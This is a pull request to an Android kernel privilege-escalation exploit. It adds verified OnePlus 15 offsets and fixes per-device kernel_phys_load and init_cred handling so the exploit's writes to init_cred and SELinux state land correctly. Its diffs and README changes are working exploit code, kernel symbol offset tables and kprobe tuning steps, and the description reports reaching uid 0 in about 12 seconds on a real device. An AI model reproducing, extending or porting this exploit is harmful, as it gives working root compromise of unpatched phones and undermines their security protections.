### PR TITLE
Add OnePlus 15 (SM8850) support; fix per-device kernel_phys_load and init_cred

### DIFF
--- a/README.md
+++ b/README.md
@@ -22,13 +22,13 @@ The `pselect6` syscall copies `fd_set` data onto the kernel stack. When combined
 |--------|-----|--------|--------|
 | OnePlus Ace 6T (PLR110) | SM8845 | `6.12.38-...-ab14275539` | **Working** |
 | OnePlus Ace 6T (PLR110) | SM8845 | `6.12.38-...-ab14552068` | **Working** |
+| OnePlus 15 (CPH2749) | SM8850 | `6.12.23-...-ab14541642` | **Working** |
 
 ### Offsets Extracted (pending device test)
 
 | Device | SoC | Kernel | Notes |
 |--------|-----|--------|-------|
 | OnePlus 15T (PLZ110) | SM8845 | `6.12.38-...-ab14552068` | Same kernel as Ace 6T. QEMU verified SP diff=-64. |
-| OnePlus 15 (OP615) | SM8845 | `6.12.23-...-ab14541642` | Offsets from OTA boot.img |
 | OnePlus 13 (IN2060) | SM8750 | `6.6.89-...-abogki446052083` | QEMU verified SP diff=-64. Use `PSELECT_SHIFT=-2`. |
 
 ### Not Feasible (stack layout incompatible)
@@ -70,16 +70,54 @@ RMX5070 ❌ (waiter at word 13):
 
 The waiter position is determined by the compiler's stack frame layout (PGO + LTO + BOLT optimization profiles), which varies per SoC branch. Same kernel version can have different layouts on different SoCs.
 
+### kernel_phys_load
+
+All kernel writes go through the image's linear-map alias:
+
+```
+data_addr(x) = PAGE_OFFSET + (kernel_phys_load - PHYS_OFFSET) + (x - KIMAGE_TEXT_BASE)
+```
+
+The bootloader picks `kernel_phys_load`, so it varies per SoC and is not in
+boot.img or the DT. Per-device field in `struct kernel_offsets`; 0 = use the
+`target.h` default.
+
+| SoC | kernel_phys_load |
+|-----|------------------|
+| SM8845 (Ace 6T) | `0xa8000000` |
+| SM8850 (OnePlus 15) | `0xc7800000` |
+
+**A wrong value fails silently** — the write still lands in mapped RAM, so
+there is no crash and no effect. Don't mistake it for a `PSELECT_SHIFT`
+problem. Read it on a rooted unit of the same model (`Kernel code` starts at
+`_stext`; `_text` is `0x10000` lower):
+
+```bash
+su -c 'grep -i "Kernel code" /proc/iomem'   # c7810000-... -> 0xc7800000
+```
+
 ### PSELECT_SHIFT
 
 Different kernels place the waiter at different positions within the controllable zone. Use `PSELECT_SHIFT` to adjust:
 
 ```bash
-# Default (Ace 6T, 6.12): shift=0
+# Default (Ace 6T + OnePlus 15, 6.12): shift=0
 /data/local/tmp/a/e
 
 # OnePlus 13 (6.6): shift=-2
 PSELECT_SHIFT=-2 /data/local/tmp/a/e
+```
+
+`check_feasibility.py`'s waiter word is unreliable: its frame arithmetic is
+right, but the struct offsets it infers from zero-stores are not (on OnePlus 15
+it gives word 3; measured is word 2). A wrong shift costs a kernel panic per
+guess, so measure it on a rooted unit instead:
+
+```bash
+echo 'p:ds do_select fdsin=+0(%x1)' >> /sys/kernel/tracing/kprobe_events
+echo 'p:rw rt_mutex_wait_proxy_lock waiter=%x2' >> /sys/kernel/tracing/kprobe_events
+# trigger FUTEX_CMP_REQUEUE_PI, then:
+#   PSELECT_SHIFT = ((waiter & 0x3fff) - (fdsin & 0x3fff)) / 8 - 2
 ```
 
 ## Exploit Flow

--- a/src/core/common.h
+++ b/src/core/common.h
@@ -368,6 +368,9 @@ void read_first_line(const char *path, char *buf, size_t len);
 void log_startup_context(void);
 void log_slide_child_context(void);
 void disable_rseq_for_thread(void);
+void init_p0_profile(void);
+extern uint64_t p0_kernel_phys_load;
+extern uintptr_t g_init_cred_image;
 int env_flag(const char *name, int def);
 int env_int_range(const char *name, int def, int min, int max);
 long futex_op(

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -84,6 +84,15 @@ static int select_offsets(void) {
     if (strcmp(uts.release, known_offsets[i].uname_r) == 0) {
       active_offsets = &known_offsets[i];
       pr_success("offsets matched: %s\n", active_offsets->uname_r);
+      /* Publish per-device symbol addresses that other TUs need. INIT_CRED
+       * here expands via the redefined INIT_CRED_OFF above, i.e. the runtime
+       * table entry rather than target.h's compile-time constant. */
+      g_init_cred_image = INIT_CRED;
+      if (active_offsets->kernel_phys_load) {
+        p0_kernel_phys_load = active_offsets->kernel_phys_load;
+      }
+      pr_info("init_cred image=%016zx alias=%016zx\n",
+              (size_t)g_init_cred_image, (size_t)data_addr(g_init_cred_image));
       return 0;
     }
   }
@@ -428,6 +437,7 @@ int run_exploit(int argc, char **argv) {
   if (!active_offsets && select_offsets() < 0) return 1;
 
   log_startup_context();
+  init_p0_profile();
   init_ashmem_path();
   pin_to_core(CORE);
 
@@ -580,6 +590,7 @@ static int run_write1_only(void) {
   set_unbuffer();
   set_limit();
   if (!active_offsets && select_offsets() < 0) return 1;
+  init_p0_profile();
   init_ashmem_path();
   pin_to_core(CORE);
   kaslr_slide = 0;

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -265,14 +265,35 @@ int has_zero_byte(uintptr_t value) {
   return 0;
 }
 
+/* Physical load address of the kernel image. Chosen by the bootloader, so it
+ * varies per SoC/board and is NOT derivable from the kernel image or DT.
+ * Verified on OnePlus 15 (SM8850/canoe) via /proc/iomem "Kernel code" =
+ * 0xc7810000 (= _stext; _text is 0x10000 lower) -> 0xc7800000, stable across
+ * boots. Override at runtime with KPHYS=0x... when porting to a new board. */
+uint64_t p0_kernel_phys_load = P0_KERNEL_PHYS_LOAD;
+
+/* Per-device image address of init_cred, set from the offsets table by main.c.
+ * Defaults to the compile-time value so non-table builds behave as before. */
+uintptr_t g_init_cred_image = INIT_CRED;
+
+void init_p0_profile(void) {
+  char *v = getenv("KPHYS");
+  if (v) {
+    p0_kernel_phys_load = strtoull(v, NULL, 0);
+  }
+  pr_info("p0 kernel_phys_load=%016llx delta=%016llx\n",
+          (unsigned long long)p0_kernel_phys_load,
+          (unsigned long long)(p0_kernel_phys_load - P0_PHYS_OFFSET));
+}
+
 uintptr_t p0_data_alias(uintptr_t image_addr) {
   uintptr_t off = image_addr - KIMAGE_TEXT_BASE;
-  uintptr_t phys = P0_KERNEL_PHYS_LOAD + off;
+  uintptr_t phys = p0_kernel_phys_load + off;
   return ((phys - P0_PHYS_OFFSET) | P0_PAGE_OFFSET);
 }
 
 uintptr_t p0_alias_image_offset(uintptr_t data_alias) {
-  return (data_alias - P0_PAGE_OFFSET) - P0_KERNEL_PHYS_DELTA;
+  return (data_alias - P0_PAGE_OFFSET) - (p0_kernel_phys_load - P0_PHYS_OFFSET);
 }
 
 uintptr_t data_addr(uintptr_t image_addr) {
@@ -493,8 +514,12 @@ int prepare_skb_payload(uintptr_t base, int payload_mode) {
           /* Write 2 (cred): child = REAL init_cred (P0 address).
            * child->__rb_parent_color corrupts init_cred.usage (bytes 0-7)
            * but that's just a ref count — large value = won't be freed.
-           * uid/caps/security/user_ns all stay intact at offsets 8+. */
-          fake_right = data_addr(INIT_CRED);
+           * uid/caps/security/user_ns all stay intact at offsets 8+.
+           * NOTE: must use the runtime per-device offset, not target.h's
+           * compile-time INIT_CRED — main.c redefines INIT_CRED_OFF to the
+           * offsets-table entry but that redefinition is main.c-local, so
+           * this TU would otherwise bake in the wrong device's address. */
+          fake_right = data_addr(g_init_cred_image);
         } else {
           /* Write 1 (selinux): child = base+0x100 → byte0=0, byte1=1 */
           fake_right = base + 0x100;

--- a/src/devices/ace6t/offsets.h
+++ b/src/devices/ace6t/offsets.h
@@ -1,7 +1,7 @@
 /* OnePlus Ace 6T (PLR110) — SM8845 / Snapdragon 8s Elite */
 
 OFFSETS_ENTRY("6.12.38-android16-5-g8c67d4274c0a-ab14275539-4k",  /* PLR110_16.0.2.403 */
-  .off_init_task=0x0240CF00, .off_init_cred=0x02422C70, .off_init_uts_ns=0x02594D88,
+  .kernel_phys_load=0xa8000000, .off_init_task=0x0240CF00, .off_init_cred=0x02422C70, .off_init_uts_ns=0x02594D88,
   .off_empty_zero_page=0x02635000, .off_root_task_group=0x0263D580,
   .off_selinux_enforcing=0x026894D0, .off_kptr_restrict=0x0240B638,
   .off_selinux_blob_sizes=0x018464E8, .off_security_hook_heads=0x01846480,
@@ -17,7 +17,7 @@ OFFSETS_ENTRY("6.12.38-android16-5-g8c67d4274c0a-ab14275539-4k",  /* PLR110_16.0
   .off_slide_boot_id=0x026AA868,
 ),
 OFFSETS_ENTRY("6.12.38-android16-5-g844001fb8721-ab14552068-4k",  /* PLR110_16.0.8.301 */
-  .off_init_task=0x0240CF00, .off_init_cred=0x02422C70, .off_init_uts_ns=0x02594DC8,
+  .kernel_phys_load=0xa8000000, .off_init_task=0x0240CF00, .off_init_cred=0x02422C70, .off_init_uts_ns=0x02594DC8,
   .off_empty_zero_page=0x02635000, .off_root_task_group=0x0263D580,
   .off_selinux_enforcing=0x026894D0, .off_kptr_restrict=0x0240B638,
   .off_selinux_blob_sizes=0x018494E8, .off_security_hook_heads=0,

--- a/src/devices/offsets.h
+++ b/src/devices/offsets.h
@@ -5,6 +5,13 @@
 
 struct kernel_offsets {
   const char *uname_r;
+  /* Physical load address of the kernel image, chosen by the bootloader.
+   * Varies per SoC/board and is not derivable from boot.img — read it from
+   * "Kernel code" in /proc/iomem on a rooted unit of the same model
+   * (subtract _stext-_text, normally 0x10000). 0 = fall back to
+   * P0_KERNEL_PHYS_LOAD from target.h. Wrong value => every write lands in
+   * unrelated RAM: no crash, no effect, very hard to debug. */
+  uint64_t kernel_phys_load;
   uint64_t off_init_task, off_init_cred, off_init_uts_ns, off_empty_zero_page;
   uint64_t off_root_task_group, off_selinux_enforcing, off_kptr_restrict;
   uint64_t off_selinux_blob_sizes, off_security_hook_heads, off_kmalloc_caches;

--- a/src/devices/op15/offsets.h
+++ b/src/devices/op15/offsets.h
@@ -1,7 +1,11 @@
-/* OnePlus 15 (PLK110) — SM8845 / Snapdragon 8s Elite */
+/* OnePlus 15 (PLK110 / CPH2745 / CPH2747 / CPH2749) — SM8850 / canoe
+ * (Snapdragon 8 Elite Gen 5). NOT SM8845; that is the Ace 6T / 15R.
+ * Symbol offsets verified 16/16 against a live CPH2749 running this exact
+ * kernel build, and against boot.img from CPH2745_16.0.9.400 (boot/init_boot
+ * are byte-identical across the regional SKUs). */
 
-OFFSETS_ENTRY("6.12.23-android16-5-gb2a876903b49-ab14541642-4k",  /* PLK110_16.0.8.301 (untested) */
-  .off_init_task=0x023ECF00, .off_init_cred=0x02402A68, .off_init_uts_ns=0x02574650,
+OFFSETS_ENTRY("6.12.23-android16-5-gb2a876903b49-ab14541642-4k",  /* verified working on CPH2749 16.0.9.400 */
+  .kernel_phys_load=0xc7800000, .off_init_task=0x023ECF00, .off_init_cred=0x02402A68, .off_init_uts_ns=0x02574650,
   .off_empty_zero_page=0x02614000, .off_root_task_group=0x0261C580,
   .off_selinux_enforcing=0x026684F0, .off_kptr_restrict=0x023EB638,
   .off_selinux_blob_sizes=0x018304E8, .off_security_hook_heads=0,


### PR DESCRIPTION
Adds a verified OnePlus 15 (SM8850) entry, and fixes two bugs that prevented the
existing OP15 offsets from ever working. Both bugs affect any non-Ace 6T device
added to the table, so this is really a portability fix with OP15 as the test case.

## 1. `kernel_phys_load` was a compile-time constant

Every kernel write goes through the linear-map alias of the kernel image:

```
data_addr(x) = PAGE_OFFSET + (kernel_phys_load - PHYS_OFFSET) + (x - KIMAGE_TEXT_BASE)
```

`P0_KERNEL_PHYS_LOAD` was fixed at the Ace 6T's `0xa8000000`, but the bootloader
picks this address and it differs per SoC. On SM8850 (canoe) it is `0xc7800000`.

| SoC | Device | kernel_phys_load | delta |
|-----|--------|------------------|-------|
| SM8845 | Ace 6T | `0xa8000000` | `0x28000000` |
| SM8850 | OnePlus 15 | `0xc7800000` | `0x47800000` |

**The failure mode is silent**, which is what makes this worth calling out. A
wrong value still points into mapped RAM, so writes land somewhere harmless:
no panic, no crash, and no effect. It looks exactly like a stack-layout problem.
I burned a lot of time (and several kernel panics) chasing `PSELECT_SHIFT` before
finding that the shift had been correct all along.

It is now a per-device field in `struct kernel_offsets`, with a `KPHYS=` env
override for bring-up. `0` keeps the `target.h` default, so existing devices are
unaffected.

To read it on a rooted unit of the same model:

```bash
su -c 'grep -iE "System RAM|Kernel code" /proc/iomem'
#   c7810000-c977ffff : Kernel code    <- _stext; _text is 0x10000 lower
```

## 2. `util.c` resolved `init_cred` at compile time

`main.c` `#undef`s the `*_OFF` macros and points them at the offsets table, but
that redefinition is local to `main.c`. `util.c`'s Write 2 path therefore baked in
the Ace 6T `init_cred` (`0x02422c70`) no matter which device was running — about
132 KB off on OnePlus 15, so the cred write could never succeed. Now published
from the table.

## Verification

On a OnePlus 15 (CPH2749, 16.0.9.400, kernel `6.12.23-android16-5-gb2a876903b49-ab14541642-4k`):

- Write 1 and Write 2 both succeed on the first attempt; uid 0 in ~12 s
- `PSELECT_SHIFT=0` (the default) is correct for this device
- all 16 table offsets match the kernel's kallsyms exactly
- all 15 struct offsets used by the cred path match the kernel's own BTF

Offsets were cross-checked against `boot.img` from the CPH2745 16.0.9.400 package,
whose kernel banner is byte-identical to the device's `/proc/version`. `boot` and
`init_boot` are identical across the OP15 regional SKUs.

## Note on `tools/check_feasibility.py`

It reports the wrong waiter word on this device. The frame-size arithmetic is
correct, but the two struct offsets it infers by counting zero-stores are not: it
gives waiter at futex `sp+0x80` and `stack_fds` at select `sp+0x18`, while the
measured values are `sp+0xa0` and `sp+0x40`. The two errors compound into a
plausible-looking word 3 instead of the actual word 2.

Since a wrong shift costs a kernel panic per guess, the README now documents
measuring it directly with kprobes on `do_select` and `rt_mutex_wait_proxy_lock`,
which is exact and non-destructive. I have not changed the tool itself — it may
well be right on the devices it was developed against, and I only have one to test.

Also corrects the OP15 SoC label (SM8850 / canoe, not SM8845 — that's the Ace 6T / 15R).

---

Developed with AI assistance; all changes were tested on real hardware.
